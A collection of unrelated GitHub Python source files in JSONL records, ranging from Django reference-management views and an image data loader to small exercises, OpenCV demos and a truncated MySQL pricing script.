referees = referees.prefetch_related(\n Prefetch(\"actions\", queryset=ReferenceAction.objects.select_related(\"user\"))\n ).select_related(\"reference\", \"application\", \"application__officer\")\n\n all_referees = list(referees)\n if \"ref_email\" in request.GET:\n ref_email = request.GET[\"ref_email\"]\n all_referees = [r for r in all_referees if r.email.lower() == ref_email.lower()]\n else:\n ref_email = None\n\n for referee in all_referees:\n referee.sort_key = [\n # Received come last:\n referee.reference_is_received(),\n # Not requested come first:\n referee.reference_was_requested(),\n # Then sort by:\n referee.application.officer.first_name,\n referee.application.officer.last_name,\n referee.name,\n ]\n # Note that we add this as an attribute because we also need to sort by\n # the same key client side.\n if referee.reference_is_received():\n continue # Don't need the following\n # decorate each Reference with suggested previous References.\n add_previous_references(referee)\n\n all_referees.sort(key=lambda referee: referee.sort_key)\n\n return TemplateResponse(\n request,\n \"cciw/officers/manage_references.html\",\n {\n \"officer\": officer,\n \"camp\": camp,\n \"title\": f\"Manage references: {camp.nice_name}\",\n \"ref_email_search\": ref_email,\n \"all_referees\": all_referees,\n },\n )\n\n\n@staff_member_required\n@camp_admin_required\n@for_htmx(use_block_from_params=True)\ndef correct_referee_details(request: HttpRequest, camp_id: CampId, referee_id: int):\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n if request.method == \"POST\":\n if \"save\" in request.POST:\n form = CorrectRefereeDetailsForm(request.POST, instance=referee)\n if form.is_valid():\n form.save()\n referee.log_details_corrected(request.user, timezone.now())\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n else:\n # cancel\n return htmx_reference_events_response(closeModal=True)\n else:\n form = CorrectRefereeDetailsForm(instance=referee)\n\n return TemplateResponse(\n request,\n \"cciw/officers/correct_referee_details.html\",\n {\n \"form\": form,\n \"referee\": referee,\n },\n )\n\n\ndef _get_previous_reference(referee: Referee, prev_ref_id: int) -> tuple[bool, Reference | None]:\n \"\"\"\n Get previous reference that matches prev_ref_id, returning:\n (\n bool indicating an exact previous reference match,\n previous reference\n\n \"\"\"\n exact_prev_reference, prev_references = get_previous_references(referee)\n\n if exact_prev_reference is not None:\n if exact_prev_reference.id != prev_ref_id:\n # This could happen only if the user has fiddled with URLs, or\n # there has been some update on the page.\n return (False, None)\n return (True, exact_prev_reference)\n else:\n # Get old referee data\n prev_references = [r for r in prev_references if r.id == prev_ref_id]\n if len(prev_references) != 1:\n return (False, None)\n return (False, prev_references[0])\n\n\n@staff_member_required\n@camp_admin_required # we don't care which camp they are admin for.\n@for_htmx(use_block_from_params=True)\ndef request_reference(request: HttpRequest, camp_id: CampId, referee_id: int):\n camp = get_camp_or_404(camp_id)\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n app = referee.application\n\n context = {}\n # Work out 'old_referee' or 'known_email_address', and the URL to use in the\n # message.\n try:\n prev_ref_id = int(request.GET[\"prev_ref_id\"])\n except (KeyError, ValueError):\n prev_ref_id = None\n if prev_ref_id:\n prev_reference_is_exact, prev_reference = _get_previous_reference(referee, prev_ref_id)\n if prev_reference is None:\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n context[\"known_email_address\"] = prev_reference_is_exact\n context[\"old_referee\"] = prev_reference.referee\n url = make_ref_form_url(referee.id, prev_ref_id)\n else:\n url = make_ref_form_url(referee.id, None)\n prev_reference = None\n\n messageform_info = dict(\n referee=referee,\n applicant=app.officer,\n camp=camp,\n url=url,\n sender=request.user,\n update=prev_reference is not None,\n )\n\n if request.method == \"POST\":\n if \"send\" in request.POST:\n context[\"show_messageform\"] = True\n form = SendReferenceRequestForm(request.POST, message_info=messageform_info)\n if form.is_valid():\n send_reference_request_email(wordwrap(form.cleaned_data[\"message\"], 70), referee, request.user, camp)\n referee.log_request_made(request.user, timezone.now())\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n elif \"cancel\" in request.POST:\n return htmx_reference_events_response(closeModal=True)\n else:\n form = SendReferenceRequestForm(message_info=messageform_info)\n\n context.update(\n {\n \"already_requested\": referee.reference_was_requested(),\n \"referee\": referee,\n \"app\": app,\n \"is_update\": prev_reference is not None,\n \"form\": form,\n }\n )\n\n return TemplateResponse(request, \"cciw/officers/request_reference.html\", context)\n\n\n@staff_member_required\n@camp_admin_required\n@for_htmx(use_block_from_params=True)\ndef fill_in_reference_manually(request: HttpRequest, camp_id: CampId, referee_id: int):\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n reference = referee.reference if hasattr(referee, \"reference\") else None\n\n try:\n prev_ref_id = int(request.GET[\"prev_ref_id\"])\n except (KeyError, ValueError):\n prev_ref_id = None\n if prev_ref_id:\n _, prev_reference = _get_previous_reference(referee, prev_ref_id)\n else:\n prev_reference = None\n\n if request.method == \"POST\":\n if \"save\" in request.POST:\n form = AdminReferenceForm(request.POST, instance=reference)\n if form.is_valid():\n form.save(referee, user=request.user)\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n else:\n # Cancel\n return htmx_reference_events_response(closeModal=True)\n else:\n form = get_initial_reference_form(reference, referee, prev_reference, AdminReferenceForm)\n\n return TemplateResponse(\n request,\n \"cciw/officers/fill_in_reference_manually.html\",\n {\n \"referee\": referee,\n \"app\": referee.application,\n \"form\": form,\n \"is_update\": prev_reference is not None,\n },\n )\n\n\n@staff_member_required\n@camp_admin_required\n@for_htmx(use_block_from_params=True)\ndef nag_by_officer(request: HttpRequest, camp_id: CampId, referee_id: int):\n # htmx only view, runs in modal dialog\n camp = get_camp_or_404(camp_id)\n referee = get_object_or_404(Referee.objects.filter(id=referee_id))\n app = referee.application\n officer = app.officer\n\n messageform_info = dict(referee=referee, officer=officer, sender=request.user, camp=camp)\n\n if request.method == \"POST\":\n if \"send\" in request.POST:\n form = SendNagByOfficerForm(request.POST, message_info=messageform_info)\n if form.is_valid():\n send_nag_by_officer(wordwrap(form.cleaned_data[\"message\"], 70), officer, referee, request.user)\n referee.log_nag_made(request.user, timezone.now())\n return htmx_reference_events_response(closeModal=True, refreshReferee=referee)\n else:\n # cancel\n return htmx_reference_events_response(closeModal=True)\n else:\n form = SendNagByOfficerForm(message_info=messageform_info)\n\n return TemplateResponse(\n request,\n \"cciw/officers/nag_by_officer.html\",\n {\n \"referee\": referee,\n \"app\": app,\n \"officer\": officer,\n \"form\": form,\n },\n )\n\n\n@staff_member_required\n@camp_admin_required\n@cache_control(max_age=3600)\ndef view_reference(request, reference_id: int):\n reference = get_object_or_404(Reference.objects.filter(id=reference_id))\n return TemplateResponse(\n request,\n \"cciw/officers/view_reference_form.html\",\n {\n \"reference\": reference,\n \"officer\": reference.referee.application.officer,\n \"referee\": reference.referee,\n \"is_popup\": True,\n },\n )\n\n\ndef htmx_reference_events_response(\n closeModal: bool = False,\n refreshReferee: Referee | None = None,\n):\n events = {}\n if refreshReferee is not None:\n events[f\"refreshReferee-{refreshReferee.id}\"] = True\n if closeModal:\n events[\"jsCloseModal\"] = closeModal\n\n return add_hx_trigger_header(HttpResponse(\"\"), events)\n\n\n@staff_member_required\n@camp_admin_required # we don't care which camp they are admin for.\n@cache_control(max_age=3600)\ndef officer_history(request, officer_id: int):\n officer = get_object_or_404(User.objects.filter(id=officer_id))\n referee_pairs = [\n app.referees\n for app in (\n officer.applications.all().prefetch_related(\"referee_set\", \"referee_set__reference\").order_by(\"-date_saved\")\n )\n ]\n\n return TemplateResponse(\n request,\n \"cciw/officers/officer_history.html\",\n {\n \"officer\": officer,\n \"referee_pairs\": referee_pairs,\n },\n )\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/views/leaders/references.py","file_name":"references.py","file_ext":"py","file_size_in_byte":12172,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"72428608809","text":"'''\nPurpose: Loads .jpg images into numpy arrays, tags them and stores image and label in dictionary, sends to .npy file for easy access.\n'''\n\nimport os\nimport cv2\nimport glob\nimport numpy as np\nfrom sklearn.utils import shuffle\n\nclass data_loader():\n\tdef __init__(self, data_filepath=''):\n\t\t'''\n\t\tInitializes data filepath, the labels for AD types, and empty dicts for the data.\n\t\t'''\n\t\tif data_filepath == '':\n\t\t\tself.filepath = os.path.abspath(os.path.join(os.getcwd(),'data'))\n\t\telse:\n\t\t\tself.filepath == data_filepath\n\n\t\tself.ad_types = ['MildDemented','ModerateDemented','NonDemented','VeryMildDemented']\n\t\tself.train_data = {'images':[], 'labels':[]}\n\t\tself.test_data = {'images':[], 'labels':[]}\n\t\tself.all_data = {'images':[], 'labels':[], 'binary_labels':[]}\n\n\tdef load_images(self):\n\t\t'''\n\t\tLoads train and test images, calls _apply_labels() to add labels, adds to train/test dicts.\n\t\t'''\n\t\ttest_images = []\n\t\tfor label in self.ad_types:\n\t\t\ttrain_files = glob.glob(self.filepath+'/train/'+label+'/*.jpg')\n\t\t\ttest_files = glob.glob(self.filepath+'/test/'+label+'/*.jpg')\n\n\t\t\ttrain_images = []\n\t\t\tfor file in train_files:\n\t\t\t\timage = cv2.imread(file)\n\t\t\t\t#image = cv2.cvtColor(cv2.imread(file), cv2.COLOR_BGR2GRAY)\n\t\t\t\ttrain_images.append(image)\n\n\t\t\ttagged_images = self._apply_labels(train_images, label)\n\n\t\t\tself.train_data['images'] = self.train_data['images'] + tagged_images['images']\n\t\t\tself.train_data['labels'] = self.train_data['labels'] + tagged_images['labels']\n\n\t\t\ttest_images = []\n\t\t\tfor file in test_files:\n\t\t\t\timage = cv2.imread(file)\n\t\t\t\t#image = cv2.cvtColor(cv2.imread(file), cv2.COLOR_BGR2GRAY)\n\t\t\t\ttest_images.append(image)\n\n\t\t\ttagged_images = self._apply_labels(test_images, label)\n\n\t\t\tself.test_data['images'] = self.test_data['images'] + tagged_images['images']\n\t\t\tself.test_data['labels'] = self.test_data['labels'] + tagged_images['labels']\n\n\tdef _apply_labels(self, images, label):\n\t\t'''\n\t\tCombines the images with the correct label .\n\t\t'''\n\t\tlabels_len = len(images)\n\t\tlabels = [label] * labels_len\n\n\t\ttagged_images = {'images':images, 'labels':labels}\n\n\t\treturn tagged_images\n\n\tdef merge_data(self):\n\t\t'''\n\t\tMerges the train and test data into a single dataset for analysis and custom train/test splits.\n\t\tRequires load_data() to have been successfully ran.\n\t\t'''\n\t\timages = self.train_data['images'] + self.test_data['images']\n\t\tlabels = self.train_data['labels'] + self.test_data['labels']\n\n\t\t# shuffle data while maintaining image/label relationship\n\t\timages, labels = shuffle(np.asarray(images), np.asarray(labels), random_state=0)\n\n\t\tself.all_data['images'] = images\n\t\tself.all_data['labels'] = labels\n\n\tdef extract_data(self):\n\t\t'''\n\t\tSends merged data to .npy (numpy) files for quicker access when performing analysis and modeling.\n\t\tRequires merge_data() to have been successfully ran.\n\t\t'''\n\t\tnp.save(self.filepath+'/image_arrays.npy', self.all_data['images'])\n\t\tnp.save(self.filepath+'/image_labels.npy', self.all_data['labels'])\n\t\tnp.save(self.filepath+'/binary_image_labels.npy', self.all_data['binary_labels'])\n\n\tdef create_binary_labels(self):\n\t\t'''\n\t\tCreates labels for identifying whether an image has any AD or not.\n\t\t'''\n\t\tbinary_labels = []\n\t\tfor label in self.all_data['labels']:\n\t\t\tif label != 'NonDemented':\n\t\t\t\tbinary_labels.append(1)\n\t\t\telse:\n\t\t\t\tbinary_labels.append(0)\n\n\t\tself.all_data['binary_labels'] = binary_labels\n\n'''\nimport data_loader as dl\nd = dl.data_loader()\nd.load_images()\nd.merge_data()\nd.create_binary_labels()\nd.extract_data()\n\n'''","repo_name":"bjhammack/masters-thesis-alzheimers-detection","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"6822446574","text":"class ContactManager:\n\n\n\tdef __init__(self, name, phone_number,email_address,website,birth_day,linkedin_id):\n\n\t\tself.name = name\n\t\tself.phone_number = phone_number\n\t\tself.email_address = email_address\n\t\tself.website = website\n\t\tself.birth_day = birth_day\n\t\tself.linkedin_id = linkedin_id\n\n\n\tdef __repr__(self):\n\t\treturn \"\"\"\n\t\tName: {}\n\t\tPhone: {}\n\t\tEmail: {}\n\t\tWebsite: {}\n\t\tBirthday: {}\n\t\tLinkedin: {}\n\t\t\"\"\".format(self.name, self.phone_number, self.email_address, self.website, self.birth_day, self.linkedin_id)\n\nname = input(\"Enter your name\")\nphone_number = input(\"Enter phone number\")\nemail_address = input(\"Enter Email Address\")\nwebsite = input(\"Whats your website URL?\")\nbirth_day = input(\"When is your Birthday?\")\nlinkedin_id = input(\"Enter your linkedin ID\")\n\nely= ContactManager(name,phone_number,email_address,website,birth_day,linkedin_id)\nprint(ely)\n\n\n\t\n\t\n","repo_name":"elypad/contact_manager","sub_path":"Technology/ContactManager/contact_manager.py","file_name":"contact_manager.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22307660222","text":"from naff import Member, slash_command\n\nfrom ElevatorBot.commandHelpers.optionTemplates import default_user_option, lfg_event_id\nfrom ElevatorBot.commandHelpers.subCommandTemplates import lfg_sub_command\nfrom ElevatorBot.commands.base import BaseModule\nfrom ElevatorBot.core.destiny.lfg.lfgSystem import LfgMessage\nfrom ElevatorBot.discordEvents.customInteractions import ElevatorInteractionContext\nfrom ElevatorBot.misc.discordShortcutFunctions import has_admin_permission\nfrom ElevatorBot.misc.formatting import embed_message\n\n\nclass LfgKick(BaseModule):\n @slash_command(\n **lfg_sub_command,\n sub_cmd_name=\"kick\",\n sub_cmd_description=\"Kick a user from an lfg event\",\n dm_permission=False,\n )\n @lfg_event_id()\n @default_user_option(description=\"The user you want to kick\", required=True)\n async def kick(self, ctx: ElevatorInteractionContext, lfg_id: int, user: Member):\n # get the message obj\n lfg_message = await LfgMessage.from_lfg_id(ctx=ctx, lfg_id=lfg_id, client=ctx.bot, guild=ctx.guild)\n\n # error if that is not an lfg message\n if not lfg_message:\n return\n\n # test if the user is admin or author\n if ctx.author.id != lfg_message.author_id:\n if not await has_admin_permission(ctx=ctx, member=ctx.author):\n return\n\n if await lfg_message.remove_member(user):\n embed = embed_message(\n \"Success\",\n f\"{user.mention} has been removed from the LFG event [{lfg_id}]({lfg_message.message.jump_url})\",\n )\n\n else:\n embed = embed_message(\n \"Error\",\n f\"{user.mention} could not be deleted from the LFG event [{lfg_id}]({lfg_message.message.jump_url}), because they are not in it\",\n )\n\n await ctx.send(ephemeral=True, embeds=embed)\n\n\ndef setup(client):\n LfgKick(client)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/commands/a_destiny/lfg/kick.py","file_name":"kick.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"27063502209","text":"from geopy.geocoders import Nominatim\ndef get_coordinates(input):\n geolocator = Nominatim(user_agent=\"here\")\n location = geolocator.geocode(input)\n try:\n coordinates = (location.latitude, location.longitude)\n return coordinates\n except:\n print(\"Location not found, please try again.\")\n\n","repo_name":"arikscherm/auto-trip-planner","sub_path":"send/geocode/geocode.py","file_name":"geocode.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3705648545","text":"import numpy as np\nfrom sunds.features import normal\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\n\n\ndef _get_encoded_img(image_array: np.ndarray) -> bytes:\n if image_array.ndim == 2: # Expand 2d array\n image_array = image_array[..., None]\n return tf.image.encode_png(image_array).numpy()\n\n\nclass ImageFeaturesTest(tfds.testing.FeatureExpectationsTestCase):\n\n def testNormalImage(self):\n img = np.random.rand(24, 24, 3).astype(np.float32)\n img_discrete = ((img + 1.0) * 32767.5).astype(np.uint16)\n img2 = np.array(\n [\n [[1.0, 0.0, 0.0]],\n [[1e-6, 0.4, -1.0]],\n [[0.9999999999999999999999999999, 0.4, -1.0]],\n ]\n )\n atol = 1e-04\n\n self.assertFeatureEagerOnly(\n feature=normal.NormalImage(),\n shape=(None, None, 3),\n dtype=np.float32,\n tests=[\n # Numpy array\n tfds.testing.FeatureExpectationItem(\n value=img,\n expected=img,\n expected_serialized=_get_encoded_img(img_discrete),\n atol=atol,\n ),\n tfds.testing.FeatureExpectationItem(\n value=img2,\n expected=img2,\n atol=atol,\n ),\n ],\n )\n","repo_name":"google-research/sunds","sub_path":"sunds/features/normal_test.py","file_name":"normal_test.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"71876948648","text":"from typing import Optional\nfrom listnode import ListNode, create_single_linked_list\n\n\nclass Solution:\n def multiply(self, num1: str, num2: str) -> str:\n if num1 == '0' or num2 == '0':\n return '0'\n\n power = 1\n response = 0\n map = {}\n\n for char1 in num1[::-1]:\n temp = 0\n response_temp = []\n if char1 not in map:\n for char2 in num2[::-1]:\n whole, remainder = divmod(int(char1) * int(char2), 10)\n remainder = remainder + temp\n temp = whole\n if remainder > 9:\n remainder = remainder % 10\n temp = temp + 1\n response_temp.append(remainder)\n if temp != 0:\n response_temp.append(temp)\n map[char1] = response_temp\n else:\n response_temp = map[char1]\n\n response = response + int(''.join(str(c) for c in response_temp[::-1])) * power\n power = power * 10\n\n return str(response)\n\n\nsolution = Solution()\nprint(solution.multiply(num1 = \"123456789\", num2 = \"987654321\"))","repo_name":"nikpopesku/leetcode","sub_path":"python/0-99/23_multiply_strings.py","file_name":"23_multiply_strings.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15163052566","text":"# Este programa es un piedra, papel, tijeras correspondiente al ejercicio 5 de la práctica 4.\n\n# Se importa librería random\nfrom random import choice\n\n# Opciones de juego\nopciones = [\"piedra\", \"papel\", \"tijera\"]\n\n# Opciones válidas para elegir del usuario\nvalidas = ['1','2','3','n']\n\n# Resultados arrancan en 0\nvictorias = derrotas = empates = 0\n\n\n# Esto es una variable doc-string. Se hace con triple comilla (pueden ser dobles o simples).\n# Esto permite hacer strings de mas de una línea.\n# Por lo general, este tipo de string se usan para documentar una función. Se verá mas adelante.\ntexto = '''Elija una opción.\n1) Piedra\n2) Papel\n3) Tijera\nn) Salir\n \n Su opción: '''\n\nwhile (True):\n # Le pido al player que elija una opción.\n player = input(texto)\n \n # Para descartar opciones inválidas\n if not player in validas: \n print(\"¡Opción inválida!\")\n continue # Vuelve a reiniciar el loop\n\n # El usuario elige salir del juego\n if player.lower() == 'n':\n break # Rompe el loop\n\n # Se convierte la opción del player a una opción válida en string\n pl = opciones[int(player)-1] \n\n # Elije la computadora\n pc = choice(opciones) # Opción en texto\n\n # Determinar si el player ganó. Estos son los casos en el que el usuario gana.\n # Observar el uso de and y or.\n gano = (pl == 'piedra' and pc == 'tijera') or (pl == 'papel' and pc == 'piedra') or (pl == 'tijera' and pc == 'papel')\n\n if gano: # Gana el player\n print (f\"¡Ganaste! Yo elegí {pc}\\n\")\n victorias+=1 # Se suma una victoria\n elif pl == pc: # Empate. Las opciones de juego son iguales. \n print (f\"¡Empatamos! Yo también elegí {pc}\\n\")\n empates+=1 # Se suma un empate\n else: # Gana PC\n print (f\"¡Perdiste! Yo elegí {pc}\\n\")\n derrotas+=1 # Se suma una derrota\n\n # Vuelve al loop\n\n\n\n\n# Informo resultados\nprint(f\"\"\"\n----------------\n¡Fin del juego!.\nResumen:\n\\tVictorias: {victorias}\n\\tDerrotas: {derrotas}\n\\tEmpates: {empates}\n\\tTotal de partidas: {victorias+derrotas+empates}\n\nGracias por jugar.\n----------------\n\"\"\")","repo_name":"kity-linuxero/practicas_23","sub_path":"practicas/ej_resueltos/pr4/ej5-cris.py","file_name":"ej5-cris.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22402918567","text":"import constriction\nimport numpy as np\nimport scipy as sp\nrg=65536\n\nentropy_model = constriction.stream.model.QuantizedGaussian(-rg, rg, mean=0, std=1e-5)\ncoder = constriction.stream.queue.RangeEncoder()\ntheory=0\nfor i in range(2048):\n message=np.random.randint(-100, 100)\n coder.encode(message, entropy_model)\n compressed = coder.get_compressed()\n theory -= np.log2(sp.stats.norm.cdf(message+0.5, loc=0, scale=1e-5) - sp.stats.norm.cdf(message-0.5, loc=0, scale=1e-5))\n print(f'{theory} vs {len(compressed) * 32} bits (includes padding to a multiple of 32 bits).')\n","repo_name":"tongdaxu/SoftVQ","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26555474255","text":"import numpy as np\nimport cv2 as cv\n\nimg = cv.imread('pikachu.png') #original\n\nimgGrayscale = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n\n\nimgBlurred5x5 = cv.blur(imgGrayscale,(5,5))\nimgBlurred15x15 = cv.blur(imgGrayscale,(15,15))\n\nimgGaussianBlurred5x5 = cv.GaussianBlur(imgGrayscale,(5,5),0)\nimgGaussianBlurred15x15 = cv.GaussianBlur(imgGrayscale,(15,15),0)\n\nimgCanny1 = cv.Canny(imgGrayscale,50,100)\nimgCanny2 = cv.Canny(imgBlurred5x5,50,100)\nimgCanny3 = cv.Canny(imgGaussianBlurred15x15,50,100)\n\nkernel = np.ones((3,3),np.uint8)\nimgDilation = cv.dilate(imgCanny2,kernel,iterations = 1)\nimgErosion = cv.erode(imgDilation,kernel,iterations = 1)\n\n#cv.imshow('Original',img)\ncv.imshow('Grayscale',imgGrayscale)\n#cv.imshow('Blur 5x5',imgBlurred5x5)\n#cv.imshow('Blur15x15',imgBlurred15x15)\n#cv.imshow('Gaussian Blur 5x5',imgGaussianBlurred5x5)\n#cv.imshow('Gaussian Blur15x15',imgGaussianBlurred15x15)\n\n#cv.imshow('Detecção de borda: Canny1',imgCanny1)\ncv.imshow('Detecção de borda: Canny2',imgCanny2)\n#cv.imshow('Detecção de borda: Canny3',imgCanny3)\ncv.imshow('Dilation',imgDilation)\ncv.imshow('Erosao',imgErosion)\n\n\n\nk = cv.waitKey(0)\n","repo_name":"fellowsheep/PG2022-2","sub_path":"HelloOpenCV-Python/HelloOpenCVFilters.py","file_name":"HelloOpenCVFilters.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34186600690","text":"from utils.setup import *\nfrom utils.config import *\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom e2e.partition import *\nimport pickle\nimport argparse\nimport time\n\n\ndef reorg(move_schedule, rewrite, fname=None):\n # Replay reorg\n reorg_time = []\n moves = []\n # Make initial layout (same across different algorithms)\n if fname is None:\n data_dir = config[\"path\"]\n in_dir = \"%s/%s/%d\" % (root, config[\"ds\"], 0)\n else:\n data_dir = join(config[\"path\"], fname)\n in_dir = \"%s/%s/%s-%d\" % (root, config[\"ds\"], fname, 0)\n labels = {}\n # Create layouts used\n indices = []\n for [t, path] in move_schedule:\n if t > 0:\n indices.append(t)\n print(t, path)\n label_path = path\n lid = 0\n if 'offline' in path:\n policy = 'offline'\n else:\n lid = int((path.split('/')[-1]).split('.')[0])\n policy = 'res'\n if 'sw/' in path:\n policy = 'sw'\n if not '-label' in label_path:\n label_path += '-label'\n bids = pickle.load(open(label_path, \"rb\"))\n if t == 0:\n if not os.path.exists(in_dir) and rewrite:\n pm.load_and_reorg_with_labels(bids, data_dir, in_dir, True)\n moves.append([0, in_dir])\n labels[label_path] = in_dir\n continue\n if label_path in labels:\n out_dir = labels[label_path]\n else:\n if fname is None:\n out_dir = \"%s/%s/%s-%d\" % (root, config[\"ds\"], policy, lid)\n else:\n out_dir = \"%s/%s/%s-%s-%d\" % (root, config[\"ds\"], fname, policy, lid)\n if args.method == 'z':\n out_dir += \"-z\"\n labels[label_path] = out_dir\n if rewrite and not os.path.exists(out_dir):\n t0 = time.time()\n pm.load_and_reorg_with_labels(bids, in_dir, out_dir, t == 0)\n t1 = time.time()\n reorg_time.append(t1 - t0)\n print(\"[T=%d] Creating layout %d in %f\" % (t, lid, t1 - t0))\n if True:\n moves.append([t, out_dir])\n print(\"%s avg reorg time: %f\" % (fname, np.average(reorg_time)))\n if rewrite:\n if fname is None:\n pickle.dump({\"idx\": indices, \"time\": reorg_time}, open(\"results/e2e/%s-%s-%s-%s-reorg.p\" % (\n config[\"ds\"], qfile, args.alg, args.method), 'wb'))\n else:\n pickle.dump({\"idx\": indices, \"time\": reorg_time}, open(\"results/e2e/%s-%s-%s-%s-%s-reorg.p\" % (\n config[\"ds\"], fname, qfile, args.alg, args.method), 'wb'))\n return moves, reorg_time\n\n\ndef query(query_schedule, moves, sqls, N, fname=None):\n query_time = []\n j = 1\n in_dir = moves[j - 1][1]\n np.random.seed(0)\n samples = sorted(np.random.choice(len(query_schedule), N, replace=False))\n print(samples[-10:])\n for q_idx in samples:\n while j < len(moves) and q_idx >= moves[j][0]:\n j += 1\n in_dir = moves[j-1][1]\n bids = query_schedule[q_idx]\n t0 = time.time()\n pm.run_query(in_dir, bids, sqls[q_idx])\n t1 = time.time()\n print(q_idx, in_dir, len(bids), t1-t0)\n query_time.append(t1 - t0)\n print(\"%s avg query time: %f\" % (fname, np.average(query_time)))\n if fname is None:\n pickle.dump({\"idx\": samples, \"time\": query_time}, open(\"results/e2e/%s-%s-%s-%s-query.p\" % (\n config[\"ds\"], qfile, args.alg, args.method), 'wb'))\n else:\n pickle.dump({\"idx\": samples, \"time\": query_time}, open(\"results/e2e/%s-%s-%s-%s-%s-query.p\" % (\n config[\"ds\"], fname, qfile, args.alg, args.method), 'wb'))\n return query_time\n\n\ndef run(num_trails, fname):\n q = []\n m = []\n for trials in range(num_trails):\n if args.alg == \"random\":\n ds = config[\"ds\"]\n if fname is not None:\n ds = fname\n move_schedule = schedule[\"%s-%d\" % (ds, trials)][\"move\"]\n query_schedule = schedule[\"%s-%d\" % (ds, trials)][\"query\"]\n else:\n move_schedule = schedule[\"move\"]\n query_schedule = schedule[\"query\"]\n\n # Reorg replay\n moves, reorg_time = reorg(move_schedule, args.rewrite, fname)\n # Query replay\n query_time = query(query_schedule, moves, sqls, args.n, fname)\n\n # Add cost\n q.append(np.average(query_time) * len(query_schedule))\n m.append(np.average(reorg_time) * (len(moves) - 1))\n\n return q, m\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Schedule replayer.')\n parser.add_argument('--config', default=\"demo\", help=\"Config File Path\")\n parser.add_argument('--rewrite', action='store_true')\n parser.add_argument('--n', type=int, default=2000)\n parser.add_argument('--alg', default='offline')\n parser.add_argument('--root', default=\"/mnt/1/partition\")\n tmp = parser.parse_args()\n args = Args(tmp.config)\n args.rewrite = tmp.rewrite\n args.alg = tmp.alg\n args.m = tmp.n\n root = tmp.root\n qfile = args.q\n alpha = args.alpha\n eps = args.eps\n session = SparkSession.builder.config(\"spark.master\", \"local[4]\").config(\"spark.driver.memory\", \"4g\").getOrCreate()\n with open(\"resources/query/%s.sql\" % qfile, \"r\") as file:\n sqls = [line.rstrip() for line in file]\n\n fnames, files, parts, config = setup_perfile(args)\n for i, fname in enumerate(fnames):\n k = parts[fname]\n pm = PartitionManager(session, k)\n # Load schedule\n if args.alg == \"random\":\n num_trails = 3\n schedule = pickle.load(open(\"resources/schedule/%s/%s-%s-%s-%d-%s-%d-%.2f-%d.p\" % (\n args.alg, config[\"ds\"], fname, qfile, args.k, args.method, alpha, eps, args.gamma), \"rb\"))\n else:\n num_trails = 1\n if args.alg == \"offline\":\n schedule = pickle.load(open(\"resources/schedule/%s/%s-%s-%s-%d-%s.p\" % (\n args.alg, config[\"ds\"], fname, qfile, args.k, args.method), \"rb\"))\n else:\n schedule = pickle.load(open(\"resources/schedule/%s/%s-%s-%s-%d-%s-%d.p\" % (\n args.alg, config[\"ds\"], fname, qfile, args.k, args.method, alpha), \"rb\"))\n\n # Main\n q, m = run(num_trails, fname)\n print(\"[%s] Query: %f, Movement: %f\" % (fname, np.average(q), np.average(m)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"d2i-lab/oreo","sub_path":"replay_main.py","file_name":"replay_main.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14853995669","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 22 17:04:47 2016\n\n@author: Daishin\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nfxrate = 1180\n'''\nimport pandas.io.data as web\nfxrate = web.DataReader('DEXKOUS','fred')\nfxrate = fxrate['DEXKOUS'][-1]\n'''\nimport pymysql\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport dateutil.relativedelta as rd\ntodaysDate = datetime.datetime.today()\nd = datetime.datetime.today() - rd.relativedelta(days=1) \nwhile d.weekday()>4:\n d = d - rd.relativedelta(days=1)\ndstr = d.strftime(\"%Y-%m-%d\")\n\n# MySQL Connection 연결\nconn = pymysql.connect(host='fdos-mt', user='root', password='3450', #db='ficc_DRvs', \n charset='utf8')\n \n# Connection 으로부터 Cursor 생성\ncurs = conn.cursor()\n \n# SQL문 실행\nsql1 = \"\"\"\nSELECT A.운용코드, A.종류, A.발행일, A.상환일, A.최초액면금액, B.액면금액, \nA.기초자산수, A.기초자산코드1, A.기초자산코드2, A.기초자산코드3, B.현재가1, B.현재가2, B.현재가3, B.S1, B.S2, B.S3, \nB.변동성1, B.변동성2, B.변동성3, B.상관계수12, 